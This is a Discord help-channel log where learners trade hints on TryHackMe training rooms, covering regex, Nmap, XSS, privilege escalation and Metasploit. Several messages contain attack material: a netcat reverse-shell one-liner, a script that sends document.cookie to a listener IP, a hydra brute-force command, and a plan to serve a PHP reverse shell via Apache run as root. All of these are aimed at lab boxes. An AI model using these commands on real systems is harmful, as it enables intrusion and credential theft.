#room-hints
One reason alone is that he left after the mute which is ban evasion, hence the immediate ban
Albeit that's coupled with several other issues
you don't need to elaborate anything to a random dude
That being said, typically we're pretty transparent about all of this
I was just curious
no worries!
have a nice meal

Don't worry about pinging us for stuff like that -- our openness/fairness is something we at least try to pride ourselves on. No one's gonna ban you unless it's pretty serious
that much I figured out by myself
but I've been yelled at for pinging people way too many times so I just apologize beforehand unless someone is expecting a ping
Heh, only thing we ask is that you don't DM without permission. Pinging is fine
Unless it happens to be something that needs said privately to a moderator
Specifics being here
!rule 1
Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.
that makes sense (been a while since I've read the rules ngl)
but I do remember that one
RIP DevGuru, you were good to us, but it was your time.
Nah I think they pulled it cuz they banned creator
Well, I had fun getting to www-data at least haha
what? what's happened?
omg
Ohh, I was doing DevGuru, can I ask how you guys exploit the box..
Is it Gitea API
the room won't come back??
It's locked at the moment.
Hope that it will comeback
ok
Discord and site bans are independent.
The staff did not pull it.
I finished the room today, my luck hehe
yup zayotic pulled the room himself
symfonos as well i think
i even finished my writeup ;-;
Omg, so happy to hear that, cuz I stuck with the room days...
want a link?

Ahh yeah I noticed it said owner locked. Perhaps he's gonna upload to vulnhub or something. Or maybe he'll get over himself
yup its goin to vulnhub
That's really sad to hear , I was so close to getting a foothold xD
I am doing the Regex room and i am stuck at task 2 question 4 , can anyone help me and explain as well how you got the answer ?..
ah sorry, it was released again so i had to private it
i shouldnt have released the writeup in the first place but i had assumed it was taken down
lol no worries i am just happy that i get to actually complete it
he pulled out his 2 other rooms tho
ah yea those were moved permanently probably
answer that worked for me is : ||[Ff]ile[1-9]||, but tbh, there's a problem with the question since it does actually match "file8" as well for example
or maybe I misunderstood something
Oh it's up again ? sweet !
Any hints?? no sessions at all and I followed every step
Your LHOST is incorrect
You need to set it to your Tun0 ip
Try typing ip a s tun0 and it should hopefully give you the correct value
tip: you can do set lhost tun0 so you don't have to look up your address
i did this
I'm going to start over
MS is hit or miss generally. this can happen even if you do everything correctly
make sure your payload is correct
also it might be an issue of msf6, cause many people reported problems
but I'm not sure
hello, im stuck to privesc from www-data on devguru room, any hint?
can anybody explain this code to me
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> <PORT> >/tmp/f
Have you tried putting that into explain shell?
Is there a machine which teaches manual sql injection?
check advent of cyber 2 - day 5, there's learning material, a place where you can practise, and also a link to another room about sqli
Yup you can see portswigger labs
Hi guys,
solving the room "Empire" and there is one question i don't manage to solve. and can't find it anywhere.
Question: What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?
I've searched on "https://attack.mitre.org/techniques" but can't find the category.
can anybody help?
Hi all,
there is one question I didn't find the right answer to in the "Nmap Room"
Q: Why are NULL, FIN and Xmas scans generally used?
A: ******** *******
I know the scans have no SYN, ACK or RST flags set and these three are more "stealthy", but I didn't find the right sentence for the question?
Thank you all
Look at the last paragraph the answer is there
thank you. done!
Hey! I'm lost on task 12 of ctf collection 1. Can someone give me a little nudge?
Check out the hint
stuck on nmap 12 question.. can someone help ? [NSE Scripts] Searching for Scripts Q:
Read through this script. What does it depend on?
hint :- Look for dependencies = {} in the Lua script.
Thanks
@stuck fractal Thanks
There is a reason given for this -- what is it?
Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!
can someone help on this
Did you do what the hint says?
Yes
So I am in THM Regex task 2, question 4, and I am stumped as to why this is not working [a-z,A-Z,0-9]
well for starters you don't need to put a comma in there, and there's an example in the room that says exactly how you combine 2 separate charsets; like this [a-zA-Z]
aside from that, if you've gotten to the point where you need to define manually that charset, you're doing something wrong (not outright wrong, but at least wrong for the purposes of this room)
because there's a much more simple way to do that kind of thing
if you need help on a specific question though, pls post it here
Yes I am a beginner so thanks for noticing. I have read the room content numerous times, and I am trying to match file 1-7. file[1-3] will match file1, file2, and file3. I put, file[a-zA-Z0-9] and nothing? ill get it. thanks?
thoughts?
because of the capital and lower case fs in file
But
You're already specifying file in the pattern
file[1-3] will match file1, file2, and file3 that's the example given
yeah but the characters in the charset are matched in that specific position
you put it in the end of the pattern, so your validator will look for those letters in the end of the pattern, so after the "file" part
remember, one charset = one char, unless you say otherwise
I feel like the example makes it very clear?
well, I'm elaborating because they said they're a beginner
Sorry that sent after your messages
Am i the only one who got devguru room turned into undefined right here? Currently the room is 404 not found
It's no longer available
Why tho?
check #room-bugs and you'll understand
Ahh ic
Have you checked the manual?
really cuz i wrote both ways
sorry, the format is not always spot on
facts, and there are typos all over the site
it is.
Report them if you find them, don't complain here.
No.
This is the room hints channel
Not the "Complain about site typos" channel
lol
i wasnt
I'm stating the fact that you can't follow the format for the clue if they don't always match
dud
whatever
it's fine
They do match though.
Let's be nice please
can anyone help with the room ALFRED
You're missing the port if you're using the attackbox
See the 405 error?
That's what happens when you GET / on the attackbox on port 80.
i set up a server on 8080
and i still get that error
i think i did it, i had to put the powershell file in the root folder
what am I missing [a-zA-Z09]? I may be overthinking this.
Again, why letters?
The example regex is file[1-3]
So match the string "file" followed by a number that's in the range of 1-3
why are these not working, Im using regexr too. *ile[0-9], \wile[0-9]
at that point you haven't been introduced to metacharacters yet. the regex room has a guided, hand-holding flow.
if you've understood the material then I suggest reading the notes again in order to understand how you should think. you're not being specific enough.
regex should be simple and specific, but if being more specific means much more complicated regex, we don't get more specific.
also pls note that * is not a wildcard in regex. that's the . dot.
Which RFC defines the appropriate behaviour for the TCP protocol?
nmap course. stuck i cant figure what it referring to?
It's in the text
RFCs are documents defining standards
They have a number, like RFC 1918 which defines Private IP space
ah well that sounds a lil bit more clear, let me see, thanks
no, can't seem to narrow down which 6 digits it wants
i dont see it?
Hi, I'm trying regex room and I'm stuck with "Match all of these emails while also adding the username and the domain name (not the TLD) in separate groups (use \w)". I've tried ||"\w+@\w+.com"||, ||"\w{1,}@\w{1,}.com"||. What am I doing wrong?
put those in spoilers
you're doing wrong at least 3 things, but if I outright tell you it will be giving it away
|| spoiler ||
there you go
you should read up again on 1) wildcards and 2) groups
you've got most of the theory down well enough
ok, I'll try that, thanks
I m here
Hey guys, for people who did the owaspjuiceshop room, there's something that i find ... illogical in the questions
the first question is 'what is the admin email'
that's easy to find
the next one is 'log in as admin'
here they use SQL injection on the user email, thus validating it as true and logging in as user with id 0, which happens to be the admin
doesn't it make more sense to use the admin email you found in the previous question and use sql insertion on the password field?
it's a small thing, but the point where you validate email as 'true' and end up in the admin account is a bit shady to me
I did not do the juiceshop... I thought it would be easy.. but it's hard.. sorry for that
haha, no problem at all
it's on the beginner pathway tho!
But still I will do it in few days
i shall be awaiting thy response!
Did you try brute force?
it's not that i can't get past
Any hint?
i just find it illogical that you do it like that
You have the email of the account that you want to access
why on earth would you use sql injection on that field
instead of just using the email and sql-injecting the password
it's a small thing
Password field
What was that..
Google rotten potato instead
Something like that
Got the 2nd one
Read an article called "Gamer Over Privileges" at shellz.club @dire maple
OK thanks
I am guessing those are commands within the exploit itself?
It looks like it anyway
For [Day 5] Web Exploitation Someone stole Santa's gift list!
How are you supposed to find the web panel link
I figured it out using the hint
but is there a way without it or is it more of lucky guessing
(Advent of Cyber 2)
@prime lichen It doesnt matter usually the person with id 1 is the admin account thats why you login as admin
Did not know that, thanks
on the room 'Jeff' other than guesswork ||is there any way to know, that the host is running the tar script with wildcards, on the files in the ftp?||
Hello! I'm working through Pickle Rick and managed to complete ingredient 1. For ingredient 2 I've found the file and the location on the server (through the webserver) and i understand that i have a limitation of commands, so i tried a couple reverse shells, ssh bruteforce looks like its out of the question cause its key based login only, i tried wget to the python simple server to see if i can get files over and my attackbox shows the get request, but i can't find the downloaded file anywhere in the system.
Just looking for a nudge in the right direction
thank you!
I also thought maybe I could escalate my webapp login by looking at the login cookie, but ended up at a deadend on that as well
what optional argument can the ftp-anon.nse script take? I am not sure what they are asking for the answer
Open up the script in a text editor.
Most nse scripts are well commented.
Can anyone help me with some tips? I am stuck in Exploiting Telnet in the Network Services room. I am still unable to run commands inside the telnet server. I follow the command lines available. There must be something I'm missing but I can't figure it out.
@neon orchid Can you show me a screenshot here?
Thanks for the hint! I was going insane with the question! 
I am currently doing Linux: Local Enumeration and I still have one question to answer. Task 6 Number 2. I used the "find" command to search for a *.conf file, but I get about a thousand results, how am I supposed to know in which file is the answer to the question?
redirect garbage using 2> /dev/null and look for a file that has sus name
sus name? Yeah I did the 2>/dev/null part, but still get 1000 valid files.
like password, flag.
are you using the file type *.conf
inside find cmd
I'll give it shot, cheers
Can anyone give me a hint on regex room? matching IPv4 address? My best solution is || (\d(1,3)\ .){3}\d{1,3} ||
in room lle.
I've generated a ssh key "ssh-keygen" with empty password
moved the content to my attack box to manager_key
chmod 600 manager_key
and now trying to ssh into the box with ssh -i manager_key manager@ip
but being prompted for password am i missing something ?
could you call the full name of the room
@white salmon sure, sorry, Linux: Local Enumeration
you need to add the public key to the authorized_keys file
@white salmon DOH... thank you
you're welcome
Morning
Looking for a hint/help on OWASP Top 10 > Task 18 IDOR Challenge
Seems very straightforward, change the 1 to another value and find the other users' notes. I've run 1-100 through Burp intruder and no other notes found, I've verified my method by confirming burp value for the return was success on ?note=1
Fuzz from 0 to like 1000
Well intruder is on 97 of 100 so it hasn't completed
Just completed, only one 'value' returned anything other than 179 and that was ?note=1
let me bump it up to 1000
You're gonna be better off using something that isn't artificially throttled
Zap, wfuzz, ffuf
Cool, thanks, let me try with one of those.
Fuzz was much faster and should have definitely started at 0
I meant Zap was much faster
Thanks
well your solution is correct, just use "{" instead of "(", it gives you ||(\d{1,3}.){3}\d{1,3}||
there's a \ missing for .
hint
Filter the wordlist down to just 4 character passwords
If you think about it, the reason it's taking so long is because it's trying incorrect passwords. Remove a bunch of definitely incorrect passwords, and it'll go fast
i read about it. It will break my heart to stop my process after running 1 hours..but thanks for the Hint really helpful
In Network Services, I am stuck when I try to ping my machine from the telnet session. I typed .RUN ping [my IP] -c 1 and I don't get any response still. Can anyone help me. Here is a screen.
You're not running TCPdump
it seems to be working?
oh wait is that where i'm supposed to be looking?
it does look like ping responses
well I'm an idiot
hi
can u help me with nmap room?
What optional argument can the ftp-anon.nse script take?
thank you
It's stuck on this ...
I run another command and it just gives another new line each time
It's not executing my commands
Yea
It is
It's blind code execution like the room tells you
You don't get the output
But it's running
I was totally confused
If the pings go through, that means you can run commands etc
Got ya! Thank you!!
I'm facing an issue
what issue?
Hitting Regex again today, yesterday was rough, regex q4 in thm, none of these are working? [Ffile1234579] , [Filefile0-9] , these work in regexr?
it's showing no password hash is loaded when running john or hashcat
it's gonna match every char in your charset, so if you have for example "ifil9", it's gonna match every single char in this string
what you want is more like ||[Ff]ile[1-9]||
@thorny wind We don't provide answers or flags
Probably not, if it's not working
Ok, so then move to #room-help and check the writeups
Can someone help a newbie out? Im doing the NMAP room and stuck on "Perform an Xmas scan on the first 999 ports of the target (10.10.78.136) -- how many ports are shown to be open or filtered?"
Getting this:
What am i doing wrong? Been looking through earlier posts - but couldn't seem to find an answer.
A hint and not an answer is appreciated
You successfully scanned all ports. You should see your answer there already.
I mean the ports you needed to scan returned the results. You have it on your terminal already
@torpid onyx Check the hint, you're missing verbosity options that will give you the info you need
OK.... So that one is good, but all of the ones I put into regexr gave me legit results, by hitting all of the required characters. It does say there are multiple answers, so were any of mine wrong? Or does it depend on what you are looking for?
Open the script in a text editor they are normally very well commented.
I'm working on the hydra room, and I think I'm getting the username wrong. I was pretty sure it's ||molly||, but it's not working with ||rockyou||. The bruteforce is definitely working, just not getting me anywhere. Any tips?
[fF]ile[1-69][^7] regex task 2 q5...am I close?
Show the command?
||hydra -l Molly -P /usr/share/wordlists/rockyou.txt 10.10.163.45 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -I||
Thanks
That's not quite right
Capture a legitimate request. You're sending data to the wrong location
Does someone know a good oscp like linux buffer overflow box?
Lol? really how do you know that
Because I've done my research?
They teach both in PWK but only assess win32 bof in the exam
But is it 100% windows?
Okay never heard of it thanks. That means i can chill now xD
For the room : Easy Peasy
To root the machine, can't we just cat out the root.txt file ?
By this i mean in the executable
best thing to do is to try it @sacred inlet and see for yourself
It worked, but there is a little messing around to do
excellent, well done
we have a channel just for aoc2 help @tribal olive, try #778305825797177374. Be sure to say exactly where you're stuck if you want only a hint, you're not really giving much context there, what have you tried, what do you see, etc?
Thanks @median compass didnt notice that there is a channel dedicated to advent of cyber 2
there's an error message in your screenshot
hello fellow humans! Doing the DailyBugle room and struggling a little with the joomla python script. Getting error messages when executed against the machine
joomblah.py script its called
Traceback (most recent call last):
File "joomblah.py", line 3, in <module>
import requests
ImportError: No module named requests
Install requests? @twilit notch
already have that but maybe try with python3?
my python is satisfied with what i have already
you need to be careful that you have requests for the right version of python
a pip install requests will fetch it for python3 these days now that python2 is deprecated
if you have pip2 installed you can fetch it for python2 with python2 -m pip install requests
if you don't have pip for python2 you can install it with wget https://bootstrap.pypa.io/get-pip.py && sudo python2 get-pip.py
thanx @median compass i needed to execute it with python2 with request install. i tried with python and python 3 and did not work
if your attempted shell doesn't work then try another, sometimes your shell might contain a filtered term, like bash for example
oh, you deleted it lol
ah well, good luck
python & python3 are most likely the same thing since python runs the default one in your path (most likely 3) : )
only since python2 is finally deprecated, older distros probably still have python linked to python2
Hello. Looking for some help with the Kubernetes and Containers Security room. When trying to escape to root using the twitter command with --server the terminal does not finish the operation. If I type ctrl + c and list the pods, the newly created pod appear as Ready 0/1. What am I missing?
do -Pn as nmap suggests, and you'll probably want to add -vv for more verbose output
also I'm not 100% sure but I think you need to put a space between -p and the port range (like -p 1-999)
Nah i tried that combo too
as I said, not 100% sure, it's one of those things you don't use that often and just spam combinations until you get it right
But NVM I'll try tomorrow and hopefully somehow things will change out of the blue
not sure what's wrong then
yeah, np
anyone have a hint to where to look for this: What is the name of the role whose job is to identify attacks against an organisation?
ive tried everything
soc analyst?
No sadly
Honestly that's a google question
i know but i still have found nothing
I'm pretty sure it's covered in the material preceding the question, no?
you are indeed correct
i thought i already tried that
apparently not
thank you
CCpentesting room Task 20 last question: ||Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine|| I am putting ||smbmap -u admin -p password -H 10.10.10.10 -x ipconfig|| I have tried it afew different ways but I am not sure what I am doing wrong.
nm got it
@balmy wedge please don't post answers.
Need help on Linux: Local Enumeration
task 1 getting a reverse shell using cmd.php by uploading it
Any hints
any idea.. when DEVGURU room will be live?
@white salmon never
it will be uploaded to vulnhub though
why so? oh! i was so close
Hello everyone,
I am stuck in Empire Room, Task 8 , Question 2.
Please help me, thank you all
@white salmon it's there right now, no panic
Hello guys, I'm on the Kubernetes room and I try to use the POC of Diana, but I have an error saying that " pkt[IP].dst = 127.0.0.1" syntax invalid.
I don't understand why I have that because it is a string so it should not be a problem
NVM I got it :
!
You could check that on vulnhub
@neon summit yes already done bro, tried many techniques ID but failed
Hello please I need advice in regular expression room task 4 and questions filenames ab0001, bb0000..... and question notes~, stuff@....
Hey, When using hashcat I am facing a problem. It stops after showing this -- > Approaching final keyspace - workload adjusted.
can anyone help
Command?
.\hashcat.exe -m 0 c328399e2bd12fde395bb044283fc60e 'D:\InfoSec\Wordlists\rockyou - Copy.txt'
you should specify the attack mode, no? with -a
or maybe the default one is 0 , I don't know
ok
hashcat.exe -m 0 -a 0 {hash} 'wordlist'
but the easy hashes were being solved without -a 0
What is this error?
don't show answers
sorry
try wrapping the string in quotes, 'cause to me it seems that it's trying to interpret the string instead of just taking it in as a hash
yeah
have you tried using https://regexr.com
you can make your own test cases to see if you match the strings
Of course just tried but still can not figure out how to reach that
try the charsets without the -
split it up into sections, first you want to define a charset and a number for the ab part, then another for the numerical part
The software using the port 8080 is a REST api, how many of its routes are used by the web application?
This is for UltraTech, Task 2, Question 5.. How do I go about checking this?
It is 1AM, so maybe my brain is a little fried.. could just be the wording of the question
haven't done it i'm afraid @dusk imp
.\hashcat.exe -m 1400 -a 0 -O "b0ba87b4443577541fa3c9a30eb640a68f082f4022e3127f1289f53741eda3ac" 'D:\InfoSec\Wordlists\rockyou - Copy.txt'
ok
Especially if you know the password is in rockyou.
My usual command is just like hashcat.exe -m <number> hash.hash rockyou.txt
Sometimes I'll append -O
ok
are you positive the password is in rockyou?
yes
I hashed a word inside rock you for checking
what room, task and question are you doing?
ok, but that hash isn't one of the questions in crackthehash, you're just doing an extra one for the practice are you?
ok, I know the issue here
you need to add a -n to your echo command
otherwise it's appending an invisible \n to the text
that's the one.
what does that issue mean?
for example Reyan
ok
notice how they're different hashes?
the first echo appears like this as plaintext "\namor2630"
the second one gets rid of the newline char, therefore making the hash "amor2630"
No problems.
it's not an error, it's information
it's just telling you that it's running out of hashes to cram into its cracking algorithm
ok...got it
you could still get a crack if say the password was the last one in the file
yaa.. i tried
@indigo pewter Did you get the room figured out?
Hi, I'm doing the owasp top 10, task 20 xss.. I did both exercises, the Hello pop and the host's IP pop up, but it's not accepting the answer. I'm guessing some character is missing or something like that.. can someone point me to how the answer is supposed to be spelled? thanks
can you show us what you've tried, and for which question
task 20, both reflected xss challenges asking for the pop up displaying Hello and the host's IP
I got the payload just not accepting the answer.. can I paste it here?
use spoiler tags to surround it (|| on either side)
||<script>alert("Hello")</script>||
there you go
thanks, didn't know that.. that's what I have for the first one but it's showing wrong answer
no, sorry, was reading my notes but got confused!
like "There's........................................Think"
that string is your flag
no, on the owasp room it's just asking me "Navigate to <IP> in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".
it's not asking for a flag
the JS popup
and that says what?
Hello
and if you enter only ||alert("Hello")|| what do you get?
"your answer is incorrect"
really? I just booted the box and I get the right return, that's weird
||none of these is accepted||
if you do the full XSS payload as you had it
you get a box saying "Hello" right?
when you dismiss that do you get another box?
I don't know how to use the spoiler tags on the image, sorry
that doesn't matter, you're not spoiling the answers there
when you click Ok to dismiss the Hello box, do you get another box?
I get the Hello popup, click Ok, then it takes me back to Reflective xss site
ok, reset the box then, something is obviously broken
ok will try that
when I click ok, I get another box with the flag pop up
so I'm guessing the answer is not the script, but the correct script is supposed to show me something then..
exactly
nothing.. even disabled the browser's xss protection that they describe there
what's the IP of your target box?
got it now, thank you, capital H was required, duh! thanks again
I'm working on the intro to networking module, specifically the WHOIS networking tool. My problem is when I Whois Fb.com I can't get the right domain creation date. I've tried all the possible related dates and still no dice ?
@zinc bronze could you maybe check what is said wrt ||the full name of the site|| like: who owns it etc.
@white coral yeah I tried that too and all the info came back the same
could you maybe DM with the output?
I got you
I have done that level, so I could see what's wrong
also have you tried checking the date format?
please remove that image
but have you checked the given date format?
I entered it like 00/00/0000
swap the month and days
I was trying to give that as a hint
lol, im not so subtle
Lol yeah idk what I'm doing wrong then. I entered it in a couple different ways to see if it would work and still no dice
could you direct message me the output?
DD/MM/YYYY
the date notation is European, though the character split is American
Hello everyone. Further NMAP room. How would you activate all of the scripts in the vuln category
Hint please
I checked both the man and it's of no help
which task is it?
Last paragraph
I was stuck there as well, read it carefully, it's there..
you got it? or need a hint?
I don't think you can hint without answer lol
Lmao
||use the switch followed by category||
--script
which task is it?
Task 3
you are probably missing one sign if you have a space between the switch and category
the answer is in man nmap @wind peak
hint: has to do with a network device
I know it's a very long man file, but you can search it with the / key
I looked in there. Nowhere does it mention vu*n
look for nmap --script and you'll find an example
check here
well that wouldn't be so much an example as an exact reference. It gives the example with a different category of scripts
but you just have to substitute one small piece of text for another
Ima take a break cuz none of these hints are making sense to me lol
dude, I told you to use search (/) and the search term nmap --script
try this
that's not a lot to make sense of is it?
I did lol
I'm feeling pretty dumb right now. Must be burnout as I've been stuck here for half an hour lol
haha me too, I am also stuck on two rooms the whole day
did you get the ssh working? was it something silly I missed?
nope, haven't got a response from anyone in tech-support
@median compass can you help me on the metasploit room
what's up?
msf6 exploit(windows/http/icecast_header) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/icecast_header) >
[*] Started reverse TCP handler on 10.8.73.11:4444
[*] Sending stage (175174 bytes) to 10.10.252.157
stuck here
this is a tricky one, there are rumours that the icecast exploit is broken on metasploit6 but I haven't tried it myself, I did the room before metasploit was upgraded and it worked. Even then though it didn't work every single time, so you could try doing it a few times to be sure
msf6 exploit(windows/http/icecast_header) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(windows/http/icecast_header) > show options
Module options (exploit/windows/http/icecast_header):
Name Current Setting Required Description
RHOSTS 10.10.252.157 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic
msf6 exploit(windows/http/icecast_header) >
should i change port of LPORT
i have msf6 and I just tried it, it works for me
you can try changing LPORT, say to 4443 and go again, that might work
can send show options data
check that your LHOST didn't reset to the wrong address, that sometimes happens too
can you dm me your whole answer?
the exploits against windows can be a little unreliable it seems @urban phoenix, not really sure why
hey guys, cannot find anything useful on google for these two questions, I've already tried everything I found , can somebody help pls?
thanks, I might have wrongly copy/pasted the first one since I also found it on other pages and didn't work but the other ones don't seem to work for the second one
All good I just found it on another website, thanks for the help!
Awesome!
Any hint for escalating privileges in anonymous room? https://tryhackme.com/room/anonymous
did you check the writeups
It's for hints
This channel is for people looking for hints and don't want to check the writeups
Have you tried looking for any SUID?
Right.. Thanks!
Would appreciate some help with the Kubernetes room. I can't escape to root on the host and find the third flag. After using the recommended twitter command my terminal loads. I press ctrl+c after and list the pods and I get a Ready 0/1 and Status - ImagePullBackOff. Any ideas?
I don't want to google linux privilege escalation since it says "everything you need is in this room" and I'm trying to stay in the spirit of the room, but I'm really stuck in zthlinux on task 43
Even if you do, it won't help you
I can set out a couple simple facts, and from there you should be able to work out how to get root, if that's good with you?
sure
So:
- Users usually create files in their home directories
- There's more users than just shiba1-4
- Sudo rights aren't that common
Why do you say that?
Ok
So look for out of place files belonging to each user
find is your friend
he has a "sudo_as_admin_successful" file
yeah, so I'm having issues with find
I guess I have to pipe find to grep to get it to be useful? since it just dumps a crapload of text
Noooo
Don't pipe find into grep
You can add 2>/dev/null to the end of a command to filter out errors
like find . shiba3 was a nightmare and I ended up just cd-ing around until I found it
You remember the > operator?
find / shiba3*
oh, I did it wrong then
I really don't understand find
for anyone who has done the pickle rick room, || do we need to do some image forensics on the files on /assets in order to have an initial foothold or get the password to connect into the ssh server? ||
No
Hello please I need an advice with regexp room question : Match every 9-character string (with letters, numbers, and symbols) that doesn't end in a "!" sign
what have you tried, what's your best attempt so far?
pretty close, \w doesn't match all of the requirements though
and have a think about the length, is it 9 characters plus one more that's not !?
hmm still nothing
letters, numbers and symbols?
well unless you show me what you're trying now it's hard to comment on that...
ok, getting warmer
did you reflect on my second hint?
you want a match that's 9 characters in total right?
the last one counts as anything except !
pls put all answers in || spoilers ||
yeah, I should have said that, mb
you could probably delete that, it's a flat out answer π
should probably delete the other one too right?
Match all of these filenames (use the + symbol): .bash_rc, .unnecessarily_long_filename, and note1
Please, what is wrong here?? || .+\w* ||
exactly || .*\w+ ||
you want to match the file names but not anything else
what specifically matches a .?
imagine you had a heap of files and you just wanted to match these ones
not sure you need to match that specifically
.* will match pretty much everything
ok you want to match "file" with either lower case f or upper case F and either 1 or 2 digits
is that too close to an answer?
are you hinting on the right question?
oh shoot
Match all of these filenames (use the + symbol): .bash_rc, .unnecessarily_long_filename, and note1
read the intro to the task 3 again @indigo pewter does . do what you want it to do here?
if a char has another meaning you have to escape it
ok but hint in answer box is .*****
right, so there's something before the . then
not in what you showed us, so we can't guess what you're doing
damn, I'm good at reading half a sentence and assuming the rest. sarc
discord removes it, you have clashing formatting, you need to do 2 \ to get one, unless you put them in ` backticks
don't focus too much on writing expressions that match the answer format in the box
you need to understand what you should use and why
+ means 1 or more of
otherwise you're just writing random stuff and hoping it will work
read up the task description that talks about wildcards and you'll see how you should use the . dot
I understand but there are many other ways to achieve those answers
the . is optional
yes, and there was no other way to make this room. there's literally countless ways to match some of the expressions. we're looking for the most simple ones and easy to write and read.
remember the modifiers, + means one or more but at least one, * means zero to any number, ? means optional
sometimes even if you know this, it's hard to find the right expression, which is why I'm giving you hints right in the question
@thin bison I can't find the page that talks about the optional character
task3 pood
seriously, it's just 4 pages
thanks,
i see it now
to be fair I didn't actually read most of this
that will be my downfall
everything is TLDR
*sigh*
it's hard when your concentration span is about 3 seconds
it's also hard to make a regex room
I've made many changes/fixes in the task descriptions to make everything as clear as I can, and I'm still open to feedback for further improvements
I know, I did a regex lab somewhere but it had javascript
if you haven't read the tasks, why do you expect someone to help you?
you might have to make a virtual machine, with the lab inside
it's very hard to make a decent regex room, I think you did great here @thin bison
the question/ answer format in the THM rooms is not ideal for regex specifically, but it's what we have. doing a whole new VM would be overkill for this, especially since it's something you can test in your own terminal.
this is actually something I didn't even recommend
I recommended you a site like regexr
you can test everything right in your browser.
yeah, I use regex101, same same but different smell
Great job!!! I love this room, I think that I've learned a lot, so I want to thank you, not to insult you
anyway, if someone wants a hint, post your question and then post (in a spoiler) what you have tried which didn't work. I'll try to give you a hint, but sometimes it will just be directing you to read something again
I didn't get insulted, you raised a valid point and I just answered you. I said it myself in task2, it was going to be tricky.
hey, considering what you had to work with, it's admirable
I wasn't trying to insult you
again, I didn't take it as an insult. but if you're in here asking for hints, the very least you can do is read the accompanying material which comes before the question you're working on
I wasn't asking for hints, I was trying to help
SO FRIENDS can we return to HINTS?:D
even worse lol
still not able to figure out on that
yeah post your question and what you have tried
maybe, flush now with all this good advice and insight, you should try a few more by yourself - edit, that was supposed to have a π at the end!
well I'm sensing that I'm more of a hindrance than a help, yeah I'm not good at taking a hint, I'll leave everyone alone now, sorry for trying
don't think that anyone said that pood, we're all volunteers here, have a great day
you were helping S1Dney so they'll be the one to tell you whether you were helping or not
heey POODy, OK you've helped me but my head is overheated :D:D
nothing wrong with taking a break, come back to it later with a clear mind
or don't come back to it at all, we won't tell π
I LL BE BACK :D:D
Hi, I'm doing the juice shop room. In the stored xss question, how do you know the name of the added header has to be True-Client-IP? thanks!
I already did it, just wondering how you get to that conclusion on the name
Some help with DVWA room, trying to send cookie to my listening box but having trouble
I can get it to show in an alert, doing <script>alert(document.cookie)</script>, just can't figure out why I can't send it?
I have netcat listening on port 80 and I can do a curl request which shows, but can't get my cookie sent
@covert tapir is this a THM room?
its for the DVWA room
it's ok, I got it by doing
```
<script>document.location='http://IP:4321/cgi-bin/grab.cgi?'+document.cookie;</script>
```
does anyone know what to do here?
well you don't need to actually supply anything there, just think about how to do it. Have you gotten a reverse shell before by running, for example, a php command in a browser?
@craggy berry Please do not show answers
no, it's like telling about privesc but I don't know this method
oh god sry guys my bad
tried || \.*\w+ || but it doesn't work
they have already given the SSH password to connect, it's telling about privesc
ok, well one way to get a shell is to compromise a web server, getting it to execute some code that sends you a shell. I recommend you try the linux privesc room here https://tryhackme.com/room/linuxprivesc
yeah this is the one i am doing now
lol yeah, sorry, didn't notice π
when you do that you will get a shell as the user that was used to run apache, that's normally not a privileged user, it'll typically be www-data for example
but if you can run apache as root, then the shell you'd get would be privileged, you would have a root shell
make sense?
yeah, it was telling we can use apache2 to get root, how can we do that?
"but if you can run apache as root, then the shell you'd get would be privileged, you would have a root shell"
you would run apache as root with the sudo command they gave you
then add a php reverse shell to the document root somewhere, something like pentestmonkey's shell
then make a listener and request the page in your browser
the shell that pops will be the same user as apache
ohk got it
therefore, you have root
but when I am doing service apache2 start it's showing some error
ok thanks for the info
i will figure it out myself
this is the way
Which Nmap switch allows you to append an arbitrary length of random data to the end of packets?
-jdjaadu
helpful
Task question room?
Have you googled it?
I would appreciate any help on the Cross-site Scripting room, task 7 precisely. Once I submit the script on the stored XSS page, the webpage just won't load again.
you're not excluding "0" with your solution and you don't match 10 characters after "Password:" but one or more
you can test your solution with https://regexr.com/
Does anyone have some resources for the room "Investigating Windows" please? I'm stuck on the compromise with the listener
What question is that?
"At what date did the compromise take place" I found the malicious task with its open port with the Scheduled Task interface but there's no date
If I remember correctly you have to check the firewall
Oh wait I haven't done that question my bad but I guess check the firewall
Ok thanks for the hint
Can someone give me push with the "In A Cave" Room? I'm looking at the walkthrough and following it to the best of my ability, but I'm stuck and can't make sense of it
If you're following the writeup, #room-help is probably the better place
Hi, is it possible to solve first quests in christmas event?
@fickle cobalt Please don't ask the same question in multiple channels like that
It's kind of spammy
sorry
Can someone please give me a hint, vague hint, for the ingredient 3 of Pickle Rick room?
I've searched|| / using a variety of greps similar to: (ingredient, potion, secret, and variants, IT: pot, sec, etc) found the rabbit hole, tried cracking Rick and R1ck using Zap at /login.php, tried SQLi on Rick and R1ck at login.php. ||
I legitimately don't remember where it is so it's not a spoiler if I tell you to look in /root just cuz that's probably where the last ingredient is
Can someone help w the RegEx room? This is the question!
Match all of these filenames (use the + symbol): .bash_rc, .unnecessarily_long_filename, and note1
In RegExr I tried this regex
||"\ .*\w+"||
It matched the files
But it doesn't accept the answer :(
Ik this is too specific but any hint would be helpful
@oblique cliff is it really just in the file system somewhere?
Yes
I've searched hidden files/folders too
yea, nothing in /root or /
Verified permissions
You sure?
69%
π
So you were able to list everything in root?
And itβs not there?
Wanna not spoil it?
π
After all weβre in hints
OOF
Ok
And when you say /root you mean /root and not /
hint : you don't need to match zero or more ".", it's actually optional (zero or one)
@grizzled jewel and @oblique cliff Thanks, this is a terrible terrible thing THM has done,I can't stop until I find it.
